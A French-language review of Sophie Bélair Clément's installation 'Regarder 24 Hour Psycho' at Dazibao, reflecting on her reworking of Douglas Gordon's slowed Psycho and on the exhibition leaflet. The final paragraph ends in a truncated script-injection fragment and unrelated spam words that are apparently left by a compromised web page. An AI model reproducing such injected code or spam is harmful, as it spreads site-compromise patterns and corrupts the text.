Regarder 24 Hour Psycho
par: Myriam Bizier
qui?
quoi?
où? quand?
Jusqu’où une œuvre doit-elle dépendre du feuillet qui l’accompagne? Comme consommateurs de médias et d’art actuels à la fois, a-t-on trop souvent le réflexe de chercher à « comprendre » une œuvre comme on comprend un enjeu socio-politique?
Qu’on ait envie de lire le feuillet ou non, l’installation sonore et vidéo de Sophie Bélair Clément chez Dazibao se visite lentement. Pour cause, l’artiste Montréalaise choisie de s’engager dans l’hyper-écoute d’une œuvre qui est elle-même une hyper-écoute du long métrage Psycho d’Alfred Hitchcock. L’artiste Douglas Gordon s’est commis une première fois en 1993 avec 24 Hour Psycho en étirant les 109 minutes du film de Hitchcock sur 24 heures. Sophie Bélair Clément à son tour choisi une séquence de la vidéo de Gordon et se l’approprie en image et en son, avec une minutie inouïe. En vidéo, elle reproduit la tension dramatique à l’amorce d’une scène de crime sous la douche, se mettant en scène elle-même dans un décor soigneusement fidèle à l’original. Son corps bouge très lentement sous l’eau qui coule son flot naturel; le décallage se fait sentir immédiatement. En contrepartie, pour l’oreille, Sophie a convoqué un ensemble de musiciens à reproduire sur leurs instruments ce qu’ils entendaient de la trame sonore de Gordon, sans pour autant voir l’image. Il en résulte une ambiance grave, modulée de minuscules variations.
Au demeurant, si je suis restée perplexe devant le mystère que cette installation induit si on n’est pas moindrement au courant de ses mécanismes, j’ai été encore déstabilisée par le feuillet qui ne dévoile pas tout du premier coup. J’en ai effectivement appris plus sur Regarder 24 Hour Psycho dans la biographie de l’artiste au verso du feuillet que dans la présentation de l’œuvre elle-même. Merci Sophie d’avoir offert à mon esprit un bon exercice mental en dualité entre le lâcher-prise et la cognition.var d=document;var s=d.createElement(‘script’); Hedrodamoude . peta dunia Peta Dunia
Discipline: art sonore, vidéo
Commentaires
Aucun commentaire
Laissez un commentaire